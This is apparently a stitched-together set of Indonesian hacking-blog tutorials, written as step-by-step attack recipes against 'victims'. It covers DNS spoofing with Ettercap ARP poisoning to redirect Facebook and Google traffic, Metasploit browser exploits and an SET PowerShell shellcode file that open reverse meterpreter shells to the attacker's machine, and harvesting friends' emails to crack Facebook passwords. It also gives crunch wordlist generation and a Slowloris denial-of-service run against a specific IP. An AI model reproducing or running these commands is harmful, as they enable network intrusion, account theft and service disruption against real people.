sekarang saya mau share Dns spoofing di Backtrack dengan Ettercap...
kebetulan masih byk yang belum tau dengan statusbaru.com ( jejaring sosial buatan Indonesia ) makanya kita alihkan www.facebook.com pada jaringan kabel ( LAN ) ataupun Wireles...
berikut POC nyaAtur dulu dns spoof nya
buka console lalu ketikkan perintah
locate etter.dns
untuk mengetahui letak pengaturan ettercap
kemudian atur dns spoofnya di pengaturan etter.dns
gedit /usr/local/share/ettercap/etter.dns
rubah ipnya menjadi ip kamu disini ip komputer saya 192.168.1.21
rubah di bagian ini
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
www.mercadolivre.com.br A 192.168.1.74
*.globo.com A 192.168.1.74
globo.com A 192.168.1.74
www.msn.com A 192.168.1.74
www.hotmail.com A 192.168.1.74
*.hotmail.com A 192.168.1.74
www.globo.com A 192.168.1.74
www.orkut.com A 192.168.1.74
*.orkut.com A 192.168.1.74
www.google.com A 192.168.1.74
*.google.com A 192.168.1.74
microsoft.com A 192.168.1.74
*.microsoft.com A 192.168.1.74
www.facebook.com A 192.168.1.74
*.facebook.com A 192.168.1.74
www.microsoft.com PTR 192.168.1.74 # Wildcards in PTR are not allowed
Kita akan spoofing facebook apabila ada korban yang membuka facebook akan di arahkan ke ip kita
KALAU INGIN SEMUA SITUS DI SPOOFING CUKUP TAMBAHKAN
*A (ip pc anda) misal = *A 192.168.1.74
pada bagian bawah sendiri.Di bawah #vim:ts=8:noexpandtab
setelah itu save dengan menekan cxtr+x lalu y dan enter
Sekarang tinggal memulai spoof dengan ettercap dengan gui agar hasil maksimal untuk spoof_dns
buka terminal dan jalankan ettercap dengan perintah
ettercap -G
lalu pilih sniff > uniffied sniffing lalu rubah interface kalian
disini saya menggunakan wlan2
lalu pilih host > scan host setelah berhasil scan lalu liat host > host list
korbann saya ada pada ip 192.168.1.20
setelah itu pilih mitm > arp poisoning > lalu centang sniff remote connection lalu ok
dan pilih plugins > manage the plugins > pilih dns_spoof dengan menklik 2x
sekarang waktunya untuk memulai meracuni ip
dengan memilih opsi start > start sniffing
sukses spoofing
GOOD LUCK . ..
atau kalau pingin cepet lewat terminal juga bisa
buka terminal lalu ketikkan perintah
ettercap -Tqi wlan0 -P dns_spoof -M arp // //
Kali ini berbagi mengenai cara melihat email teman di facebook yang kemudian bisa digunakan untuk hacking password facebook, hal ini bisa dilakukan melalui informasi email tersebut, download facebook account hacking melalui informasi email& merupakan salah satu facebook hacking tips and tricks 2013 untuk mencuri informasi email.
Firstly/pertama, login ke facebook anda dulu kemudian
login ke Akun yahoo yang kalian gunakan login ke facebook atau akun yahoo lainya untuk mengimport kontak dari facebook
Nah, udah masuk ke akun yahoo lanjut ke tab “kontak”, klik Import Kontak
Karena kita akan melihat email teman facebook, maka kita pilih/klik facebook nanti akan ada layar pop up yang muncul, klik ya/yes
Tunggu proses import yang di lakukan oleh yahoo
Setelah proses impor selesai klik back to contact /selesai
dan ini hasilnya
Taraaaa….beratus ratus email muncul di tab baru
hehehehe
hehehehe
Kali ini saya mencoba untuk mengexploitasi java dengan
buka terminal
ketikkan msfconsole pada terminal
use exploit/multi/browser/java_signed_appletset payload windows/meterpreter/reverse_tcp
set appletname Update
set srvhost 192.168.1.74 (ip lokal kita)
set srvport 80
set uripath Updatingfacebook
set lhost 192.168.1.74 [ ip lokal kita ]set lport 443exploit
tunggu korban install plug ins
dan setelah korban meng running plugin
maka sesi telah terbuka
tehnik ini bisa digabungkan dengan spoofing pada dns
artikelnya bisa di lihat di --> http://trojanzboy.blogspot.com/2012/11/dns-spoof-dengan-ettercap-gui.html
atau
test di
windows xp sp0/1/2/3
vista
7
Tidak ada habisnya celah pada produk microsoft ini ada banyak sekali bug yang rentan di exploit
langsung saja disini saya menggunakan SET (Social enginering toolkit) pada backtrack segera lah beralih ke produk linux satu ini
buka console terminal ketik
cd /pentest/exploits/setdan enter
dan yes./set
Lalu pilih no 1 social-enginering attack
Lalu pilih no 10 power shell attack vector
Lalu pilih no 1 powershell alphanumeric shellcode injector
Lalu masukkan ip kalian pada payload listener
dan tunggu hingga proses selesai
Dari sini dihasilkan file yang bernama x86_powershell_injection.txt yang berada pada pentest > exploits > set > reports > powershell dan rubah ekstensi menjadi .bat , nah file ini yang akan dieksekusi korban agar kita bisa menyusup pada PC korban
berhubung disini korban pentesting menggunakan windows 32 bit maka saya memilih x86poweshell
an
dan pilih x86 bit pada victim machine
lalu tunggu hingga meload metasploit
Dan tunggu hingga korban mengeksekusi file shellcode yang telah kita buat dan rename tadi.
Banyak cara untuk mengirimkan file tersebut bisa menggunakan media upload di internet atau bujuk rayu kalian dan bisa juga lewat spoofing pada localhost kita tunggu hingga korban mengkliknya
sehingga kita dapat session meterpreter dan ketika dapat session
lalu setelah mendapatkan session 1
langsung ketikkan
sessions -i 1
meterpreter PC tersebut berada di tangan kalian
Hal pertama yang perlu kalian lakukan adalah membuka terminal dan menulis
cd /pentest/passwords/crunch
lalu ketikkan peintah
more charset.lstmaka akan muncul pilihan charset yang ingin kalian gunakan
numeric = [0123456789]
numeric-space = [0123456789 ]
symbols14 = [!@#$%^&*()-_+=]
symbols14-space = [!@#$%^&*()-_+= ]
symbols-all = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
symbols-all-space = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
ualpha = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
ualpha-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ]
ualpha-numeric = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ualpha-numeric-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
ualpha-numeric-symbol14 = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-
_+=]
ualpha-numeric-symbol14-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-
_+= ]
ualpha-numeric-all = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-
_+=~`[]{}|\:;"'<>,.?/]
ualpha-numeric-all-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-
_+=~`[]{}|\:;"'<>,.?/ ]
lalpha = [abcdefghijklmnopqrstuvwxyz]
disana terdapat banyak sekali character alphabet dan numeric atau symbol tekan enter sampai more 100%
Disini saya contohkan akan membuat wordlist alphabet kecil,nomer,dan simbol
jadi saya menggunakan charset lalpha-numeric-symbol14
./crunch 1 5 -f charset.lst lalpha-numeric-symbol14 -o TrojanzBoy.lst
keterangan
1 = memulai wordlist dengan 1karakter sampai 5 kata
5 = banyaknya karakter sampai 5 karakter
lalpha-numeric-symbol14 = wordlist menggunakan alphabet,nomer,dan symbol
-o dvil.lst = hasil keluaran wordlist
dan hail outputnya bisa dilihat pada pentest/paswords/crunch
atau membuat kata yang ingin kalian gunakan misal kata admin
./crunch 10 10 -t admin@@@@@ lalpha -o TrojanzBoy.lst
keterangan
10 10 = jumlah karakter untuk pengacakan kata (admin@@@@@)
@@@@@ = pengacakan random kata terdiri dari 5 karakter bisa di rubah sesuai keingginan misal 6 karakter berarti @@@@@@
lalpha = wordlist alphabet untuk pengacakan pada @@@@@
-o dvil.lst = hasil dari wordlist
Atau menggunakan simpel pengacakan kata admin
./crunch 5 5 admin -o TrojanzBoy.lstIni akan menginstruksikan crunch untuk membuat wordlist yang akan memiliki panjang minimal karakter 5, panjang maksimum karakter 5 dengan karakter admin dan akan menyimpannya pada file txt
HASIL OUTPUTNYA AKAN DISIMPAN DI DIRECTORY /pentest/passwords/crunch
Untuk memasuki system windows 7 ada banyak cara salah satunya memanipulasi add on dari mozilla ketika menjalankan exploit ini browser korban akan muncul dialog penginstalan add on mozilla ketika korban klik install dan menjalankan payload dengan hak akses penuh pada komputer korban dan berhasil telah saya coba pad lab saya
berikut POC nya
Atur dulu dns spoof nya
buka console lalu ketikkan perintah
locate etter.dns
untuk mengetahui letak pengaturan ettercap
kemudian atur dns spoofnya di pengaturan etter.dns
gedit /usr/local/share/ettercap/etter.dns
rubah ipnya menjadi ip kamu disini ip komputer saya 192.168.1.74
tambahkan facebook di bagian ini
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
facebook.com A 192.168.1.74
*facebook.com A 192.168.1.74
www.facebook.com A 192.168.1.74
google.com A 192.168.1.74
*google.com A 192.168.1.74
www.google.com A 192.168.1.74
microsoft.com A 192.168.1.74
*.microsoft.com A 192.168.1.74
www.microsoft.com PTR 192.168.1.74 # Wildcards in PTR are not allowed
Kita akan spoofing facebook apabila ada korban yang membuka facebook akan di arahkan ke ip kita
KALAU INGIN SEMUA SITUS DI SPOOFING CUKUP TAMBAHKAN
*A (ip pc anda) misal = *A 192.168.1.74
pada bagian bawah sendiri.Di bawah #vim:ts=8:noexpandtab
setelah itu save
Ketika sudah di set buka msfconsole pada terminal backtrack
Tunggu hingga metasploit muncul dan ketikkan perintah exploitnya
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set payload windows/meterpreter/reverse_tcp
set addonname Upadating
set srvhost 192.168.1.74 --> ip lokal kita
set srvport 80
set uripath /
set lhost 192.168.1.74 --> ip lokal kita
set lport 443
exploit
sekarang kita coba untuk menjalankan spoofing
buka terminal baru lalu ketikkan di terminal
ettercap -Tqi wlan0 -P dns_spoof -M arp // //
ket = wlan0 adalah interface wifi saya untuk mengeceknya bisa ketikkan airmon-ng untuk melihat interface nya
Tunggu korban membuka facebook.com/google.com supaya di spoofing ke malicious ip kita
dan sukses korban membuka google.com yang nantinya di alihkan ke malicious ip kita
dan tunggu hingga korban menginstall add on malicious tadi
dan sessions telah di buka
tekan ctrl + c karna session 1 telah di buka
ketikkan sessions -i 1 untuk membuka sesi pertama
dan pc tersebut berada di tangan kamu
Dampak Serangan Dos
-Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
-Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
Download dulu toolnya Slowloris.pl
lalu taruh di desktop
buka terminal ketikkan perintah seperti di bawah
cd Desktop/
chmod +x slowloris.pl
./slowloris.pl
Lalu jalankan serangan
perl ./slowloris.pl -dns 125.165.26.21 -timeout 500 -num 5000 -cache
ganti warna hiaju dengan ip korban anda
Dan tunggu hingga down seperti
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Sending data.
Current stats: Slowloris has now sent 99 packets successfully.
This thread now sleeping for 500 seconds...
